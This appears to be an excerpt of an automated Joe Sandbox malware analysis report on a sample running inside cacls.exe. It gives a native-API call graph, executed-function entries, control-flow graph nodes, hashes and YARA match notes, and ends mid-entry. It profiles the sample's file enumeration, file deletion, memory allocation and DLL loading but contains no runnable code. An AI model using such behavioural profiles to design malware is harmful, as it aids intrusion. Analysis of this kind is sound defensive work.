bfb960 RtlFreeHeap 101833->101834 101835 beb081 101834->101835 101835->101819 101837 beaa36 101836->101837 101844 beaa41 101836->101844 101838 bfba40 RtlAllocateHeap 101837->101838 101838->101844 101839 beaa62 101839->101821 101840 be86c0 GetFileAttributesW 101840->101844 101841 bead72 101842 bead8b 101841->101842 101843 bfb960 RtlFreeHeap 101841->101843 101842->101821 101843->101842 101844->101839 101844->101840 101844->101841 101845 bea470 RtlFreeHeap 101844->101845 101846 bea7e0 RtlFreeHeap 101844->101846 101845->101844 101846->101844 101848 be86e1 101847->101848 101849 be86f3 101848->101849 101850 be86e8 GetFileAttributesW 101848->101850 101849->101826 101851 bf36f0 101849->101851 101850->101849 101852 bf36fe 101851->101852 101853 bf3705 101851->101853 101852->101829 101854 be4890 LdrLoadDll 101853->101854 101855 bf373a 101854->101855 101856 bf3749 101855->101856 101879 bf31b0 LdrLoadDll 101855->101879 101858 bfba40 RtlAllocateHeap 101856->101858 101863 bf38f4 101856->101863 101859 bf3762 101858->101859 101860 bf38ea 101859->101860 101862 bf377e 101859->101862 101859->101863 101861 bfb960 RtlFreeHeap 101860->101861 101860->101863 101861->101863 101862->101863 101864 bfb960 RtlFreeHeap 101862->101864 101863->101829 101865 bf38de 101864->101865 101865->101829 101867 bea496 101866->101867 101880 bedeb0 101867->101880 101869 bea508 101871 bea690 101869->101871 101872 bea526 101869->101872 101870 bea675 101870->101829 101871->101870 101873 bea330 RtlFreeHeap 101871->101873 101872->101870 101885 bea330 101872->101885 101873->101871 101876 bea806 101875->101876 101877 bedeb0 RtlFreeHeap 101876->101877 101878 bea88d 101877->101878 101878->101831 101879->101856 101882 bedecf 101880->101882 101881 bedee1 101881->101869 101882->101881 101883 bfb960 RtlFreeHeap 101882->101883 101884 bedf24 101883->101884 101884->101869 101886 bea34d 101885->101886 101889 bedf40 101886->101889 101888 bea453 101888->101872 101890 bedf64 101889->101890 101891 bee00e 101890->101891 101892 bfb960 RtlFreeHeap 101890->101892 101891->101888 101892->101891 101893 bf8cd0 101894 bf8d5f 101893->101894 101896 bf8cfb 101893->101896 101898 3852ee0 LdrInitializeThunk 101894->101898 101895 bf8d90 101898->101895 101899 bf96d0 101900 bf977a 101899->101900 101902 bf96fe 101899->101902 101901 bf9790 NtReadFile 101900->101901 101903 bf6410 101904 bf646a 101903->101904 101906 bf6477 101904->101906 101907 bf3e10 101904->101907 101908 bfb8d0 NtAllocateVirtualMemory 101907->101908 101909 bf3e51 101908->101909 101910 be4890 LdrLoadDll 101909->101910 101912 bf3f5e 101909->101912 101913 bf3e97 101910->101913 101911 bf3ee0 Sleep 101911->101913 101912->101906 101913->101911 101913->101912 101914 bf8e50 101915 bf8e6a 101914->101915 101918 3852df0 LdrInitializeThunk 101915->101918 101916 bf8e92 101918->101916 101919 bf97d0 101920 bf9847 101919->101920 101922 bf97fb 101919->101922 101921 bf985d NtDeleteFile 101920->101921 101923 bf1b10 101924 bf1b2c 101923->101924 101925 bf1b68 101924->101925 101926 bf1b54 101924->101926 101927 bf9870 NtClose 101925->101927 101928 bf9870 NtClose 101926->101928 101929 bf1b71 101927->101929 101930 bf1b5d 101928->101930 101933 bfba80 RtlAllocateHeap 101929->101933 101932 bf1b7c 101933->101932 101934 be2a8c 101935 be2ab8 101934->101935 101936 be6610 2 API calls 101935->101936 101937 be2ac3 101936->101937 101939 be7480 101940 be749c 101939->101940 101944 be74ef 101939->101944 101942 bf9870 NtClose 101940->101942 101940->101944 101941 be7627 101943 be74b7 101942->101943 101949 be68a0 NtClose LdrInitializeThunk LdrInitializeThunk 101943->101949 101944->101941 101950 be68a0 NtClose LdrInitializeThunk LdrInitializeThunk 101944->101950 101946 be7601 101946->101941 101951 be6a70 NtClose LdrInitializeThunk LdrInitializeThunk 101946->101951 101949->101944 101950->101946 101951->101941 101952 be5f00 101953 be8450 LdrInitializeThunk 101952->101953 101955 be5f30 101952->101955 101953->101955 101956 be5f5c 101955->101956 101957 be83d0 101955->101957 101958 be8414 101957->101958 101963 be8435 101958->101963 101964 bf8b70 101958->101964 101960 be8425 101961 be8441 101960->101961 101962 bf9870 NtClose 101960->101962 101961->101955 101962->101963 101963->101955 101965 bf8bf0 101964->101965 101967 bf8b9e 101964->101967 101969 3854650 LdrInitializeThunk 101965->101969 101966 bf8c15 101966->101960 101967->101960 101969->101966 101970 bec940 101972 bec969 101970->101972 101971 beca6d 101972->101971 101973 beca13 FindFirstFileW 101972->101973 101973->101971 101974 beca2e 101973->101974 101975 beca54 FindNextFileW 101974->101975 101975->101974 101976 beca66 FindClose 101975->101976 101976->101971 101977 bfb640 101978 bfb64b 101977->101978 101979 bfb66a 101978->101979 101981 bf5e90 101978->101981 101982 bf5ef2 101981->101982 101984 bf5eff 101982->101984 101985 be2620 101982->101985 101984->101979 101986 be25ee 101985->101986 101989 be25e6 101985->101989 101987 bf8ea0 LdrInitializeThunk 101986->101987 101988 be25f2 101987->101988 101993 bf9900 101988->101993 101989->101988 101991 bf8ea0 LdrInitializeThunk 101989->101991 101992 be260b 101989->101992 101991->101988 101992->101984 101994 bf998f 101993->101994 101995 bf992b 101993->101995 101998 3852e80 LdrInitializeThunk 101994->101998 101995->101992 101996 bf99c0 101996->101992 101998->101996

                                                            Executed Functions

                                                            Function 00BD9E50 Relevance: 26.6, Strings: 21, Instructions: 395COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 27 bd9e50-bda0c8 28 bda0d2-bda0d9 27->28 29 bda0db-bda0fb 28->29 30 bda125-bda12c 28->30 33 bda0fd-bda101 29->33 34 bda102-bda104 29->34 31 bda15e-bda16f 30->31 32 bda12e-bda15c 30->32 37 bda180-bda18a 31->37 32->30 33->34 35 bda10f-bda123 34->35 36 bda106-bda10c 34->36 35->28 36->35 38 bda18c-bda19f 37->38 39 bda1a1-bda1a8 37->39 38->37 41 bda1c9-bda1d3 39->41 42 bda1aa-bda1c7 39->42 43 bda1e4-bda1f0 41->43 42->39 44 bda206-bda210 43->44 45 bda1f2-bda204 43->45 46 bda248-bda261 44->46 47 bda212-bda22c 44->47 45->43 46->46 51 bda263 46->51 49 bda22e-bda232 47->49 50 bda233-bda235 47->50 49->50 52 bda237-bda240 50->52 53 bda246 50->53 54 bda26a-bda274 51->54 52->53 53->44 55 bda2ad-bda2be 54->55 56 bda276-bda291 54->56 59 bda2cf-bda2db 55->59 57 bda298-bda29a 56->57 58 bda293-bda297 56->58 62 bda29c-bda2a5 57->62 63 bda2ab 57->63 58->57 60 bda2dd-bda2ea 59->60 61 bda2ec-bda2f5 59->61 60->59 65 bda2fb-bda305 61->65 66 bda4f0-bda4fa 61->66 62->63 63->54 67 bda316-bda320 65->67 68 bda50b-bda517 66->68 69 bda36e-bda381 67->69 70 bda322-bda36c 67->70 71 bda519-bda525 68->71 72 bda527-bda537 68->72 73 bda392-bda39b 69->73 70->67 71->68 72->72 76 bda539-bda540 72->76 77 bda39d-bda3a9 73->77 78 bda3b9-bda3bd 73->78 79 bda546-bda54d 76->79 80 bda612-bda61b 76->80 81 bda3ab-bda3b1 77->81 82 bda3b7 77->82 84 bda3bf-bda3e4 78->84 85 bda3e6-bda3f5 78->85 83 bda558-bda55f 79->83 81->82 82->73 87 bda59e call bfb5a0 83->87 88 bda561-bda59c 83->88 84->78 89 bda3fb-bda405 85->89 90 bda4e1-bda4eb 85->90 96 bda5a3-bda5ad 87->96 92 bda54f-bda555 88->92 91 bda416-bda41f 89->91 90->61 94 bda42f-bda439 91->94 95 bda421-bda42d 91->95 92->83 99 bda44a-bda456 94->99 95->91 97 bda5be-bda5c7 96->97 100 bda5c9-bda5d2 97->100 101 bda5d4-bda5de 97->101 102 bda458-bda461 99->102 103 bda463-bda46d 99->103 100->97 105 bda5ef-bda5fb 101->105 102->99 107 bda46f-bda489 103->107 108 bda4a5-bda4af 103->108 105->80 109 bda5fd-bda610 105->109 110 bda48b-bda48f 107->110 111 bda490-bda492 107->111 112 bda4c0-bda4c9 108->112 109->105 110->111 116 bda494-bda49d 111->116 117 bda4a3 111->117 113 bda4df 112->113 114 bda4cb-bda4dd 112->114 113->66 114->112 116->117 117->103
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "n$)t$,$/a$8n$=G$@$B`$PY$Pq$Yu$Z4$jJ$m@$p$us$x`$z)$z`$q$~
                                                            • API String ID: 0-299318214
                                                            • Opcode ID: 54d11158f4db1bac9fbaf24f5e08f859bcecdff9bbbdeb3dbff5851b0a23cc05
                                                            • Instruction ID: 87f94d0d4ab9c2e106bb2ee5af64771925c7f47aab2b692f70b77f95c658afc2
                                                            • Opcode Fuzzy Hash: 54d11158f4db1bac9fbaf24f5e08f859bcecdff9bbbdeb3dbff5851b0a23cc05
                                                            • Instruction Fuzzy Hash: 5722A2B0D05229CBEB24CF45C894BDDFBB2BB44308F1081DAC549AB380E7B55A88DF65
                                                            Function 00BEC940 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 00BECA24
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 00BECA5F
                                                            • FindClose.KERNELBASE(?), ref: 00BECA6A
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                            • Instruction ID: 884657bf1191c358b7589d3a36bf56597bf85036d74814f0bfa400f1666a772d
                                                            • Opcode Fuzzy Hash: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                            • Instruction Fuzzy Hash: 4B316071A0034CBBDB20DBA5CC85FFF77BCDB44745F104598BA09A7181DB70AA858BA0
                                                            Function 00BF9560 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?,?,?), ref: 00BF9661
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                            • Instruction ID: 45b142e2bfd7b71e4eafd1614e63dc1ae3fb17d5082cee20caed1b12496e68f3
                                                            • Opcode Fuzzy Hash: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                            • Instruction Fuzzy Hash: A231C0B5A01248ABDB14DF98D881EEFB7F9AF8C304F108259F909A7340D770A955CFA5
                                                            Function 00BF96D0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtReadFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?), ref: 00BF97B9
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                            • Instruction ID: 89fbb0712b9d43f74f9d2187a4d7f8c21d766e66fa6ec5fea73a1f1e3c291006
                                                            • Opcode Fuzzy Hash: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                            • Instruction Fuzzy Hash: 6031D3B5A00209AFDB14DF98D881EEFB7F9EF88314F108259F919A7340D770A9158FA1
                                                            Function 00BF99D0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00BE209E,?,00BF834F,C3714B7A,00000004,00003000,?,?,?,?,?,00BF834F,00BE209E,00BFB901,00BF834F,520F8B51), ref: 00BF9A98
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                            • Instruction ID: f177a3088bf2b0bae4c3eb77287a44d804bbd68714a3aa6894cbc14e515d8b2e
                                                            • Opcode Fuzzy Hash: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                            • Instruction Fuzzy Hash: 212108B5A00609ABDB14DF98DC81EEFB7F9EF88710F108149FA19A7340D770A915CBA1
                                                            Function 00BF97D0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                            • Instruction ID: bf609634d8c862df174a0c20856ba55274a61f956ae3f72ba1a39d83cc4ab445
                                                            • Opcode Fuzzy Hash: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                            • Instruction Fuzzy Hash: 54119171600208BBD620EAA8CC42FEBB7ACDF85714F108149FA0957281E7716A19CBE1
                                                            Function 00BF9870 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtClose.NTDLL(?,00BE3443,001F0001,?,00000000,?,?,00000104), ref: 00BF98A4
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_bd0000_cacls.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                            • Instruction ID: 4a4d2d2d366eda00975baa4b939cf7966a4bd84eefa1e5c7a56d74a6676cac2a
                                                            • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                            • Instruction Fuzzy Hash: 31E046762102187BC220AA69DC01FEBB7ACEBC5760F008455FA08A7242CA70BA558BF1
                                                            Function 03854340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1fc85314d5d6a6a9823e2e17578dbdd8faf14c268a3d106fdceffd84a905eb79
                                                            • Instruction ID: 0e35be2d197d57f5d7772dcf9ed2deb12c408a3d3dac5e156efc031f387e2205
                                                            • Opcode Fuzzy Hash: 1fc85314d5d6a6a9823e2e17578dbdd8faf14c268a3d106fdceffd84a905eb79
                                                            • Instruction Fuzzy Hash: 67900271605804169140B1984C84646400597E0302B65C051E5468554C8B148A5A5362
                                                            Function 03854650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 09bf062549e407071dc6c993405424fb8970097344317f02b794c2c169053225
                                                            • Instruction ID: 7919a1ef0afd5d91987b6e8bb5a4990d4fabe10f8bb14ecd3245f8bbd98e34ec
                                                            • Opcode Fuzzy Hash: 09bf062549e407071dc6c993405424fb8970097344317f02b794c2c169053225
                                                            • Instruction Fuzzy Hash: C69002A1601504464140B1984C04506600597E13023A5C155A5598560C87188959926A
                                                            Function 03852BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3f54db308791ff808d6b01d5b6d198070c09c2322887a6e48cb5aad2a6fa8ec1
                                                            • Instruction ID: a3f6501c17b597b9ddc8d8edf8c3524291b25547a87c820e519c5fbc7ba99cf8
                                                            • Opcode Fuzzy Hash: 3f54db308791ff808d6b01d5b6d198070c09c2322887a6e48cb5aad2a6fa8ec1
                                                            • Instruction Fuzzy Hash: FC90027160540C06D150B1984814746000587D0302F65C051A5068654D87558B5976A2
                                                            Function 03852BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0a77f9dbf968bbdfce8bc67376fcff2ef0c1d95152efe9544dc12fc838d2e2d0
                                                            • Instruction ID: 515074f15f877d45757fa6ed45f1773e6b6478418921d97e044332f709653f2c
                                                            • Opcode Fuzzy Hash: 0a77f9dbf968bbdfce8bc67376fcff2ef0c1d95152efe9544dc12fc838d2e2d0
                                                            • Instruction Fuzzy Hash: 2690027120544C46D140B1984804B46001587D0306F65C051A50A8694D97258E59B662
                                                            Function 03852BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 06a8c900ed5d7afc3ef6d3989b9d45991f95ed10e7ada281fc2005871499e4cc
                                                            • Instruction ID: 7077171c614922e3bee0378873231b3e21ea1416c852d29a703fa9e6bda95b91
                                                            • Opcode Fuzzy Hash: 06a8c900ed5d7afc3ef6d3989b9d45991f95ed10e7ada281fc2005871499e4cc
                                                            • Instruction Fuzzy Hash: 5E90027120140C06D180B198480474A000587D1302FA5C055A5069654DCB158B5D77A2
                                                            Function 03852B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ac97e25cd62903a7c88ba65a446658aeb13748e010d2a26b421525d9a367b370
                                                            • Instruction ID: 4553d1a80a98db2c76da28bac4f11d7a15d52ac1c26e943882e404813eee1bab
                                                            • Opcode Fuzzy Hash: ac97e25cd62903a7c88ba65a446658aeb13748e010d2a26b421525d9a367b370
                                                            • Instruction Fuzzy Hash: 649002A1202404074105B1984814716400A87E0202B65C061E6058590DC62589956126
                                                            Function 03852AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 5f39f6cc869d95d81b764bd8a1d96947094cf609706c9d4b6eb11937c6a61998
                                                            • Instruction ID: 4e38f0b170d05eb8e879bd42dbdf1cbe22269a3cd79b71cea3de90f6833f4c22
                                                            • Opcode Fuzzy Hash: 5f39f6cc869d95d81b764bd8a1d96947094cf609706c9d4b6eb11937c6a61998
                                                            • Instruction Fuzzy Hash: 66900265211404070105F5980B04607004687D5352365C061F6059550CD72189655122
                                                            Function 03852AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 03e6ee45568064831e1a3559f4829d9ba1feefde6be37749e784a6b5f6348eb9
                                                            • Instruction ID: 7494d9bd2fa5d5c4a7dbb6af2424ebcd89886718084832ecbb1db5c170af5a0c
                                                            • Opcode Fuzzy Hash: 03e6ee45568064831e1a3559f4829d9ba1feefde6be37749e784a6b5f6348eb9
                                                            • Instruction Fuzzy Hash: E7900265221404060145F5980A0460B044597D63523A5C055F645A590CC72189695322
                                                            Function 03852FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 955a16092d94a8ebf92a7c5fce75f69ec4315e579d5f442a51f258d74c24859a
                                                            • Instruction ID: 56938f24d00e55d2eb809ca07d550404f1b7014a6d59e3b8266df465b4f79a42
                                                            • Opcode Fuzzy Hash: 955a16092d94a8ebf92a7c5fce75f69ec4315e579d5f442a51f258d74c24859a
                                                            • Instruction Fuzzy Hash: B9900261601404464140B1A88C44A064005ABE1212765C161A59DC550D865989695666
                                                            Function 03852FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4d56bc6f78208602d55c45f9cb1873693c69d5dd663e53a073c66ddaa91d0218
                                                            • Instruction ID: cf9e264c88604cb05c4d8411d7c2338987a5e5756d47c84ed7505a59b42913f9
                                                            • Opcode Fuzzy Hash: 4d56bc6f78208602d55c45f9cb1873693c69d5dd663e53a073c66ddaa91d0218
                                                            • Instruction Fuzzy Hash: 52900261211C0446D200B5A84C14B07000587D0303F65C155A5198554CCA1589655522
                                                            Function 03852F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
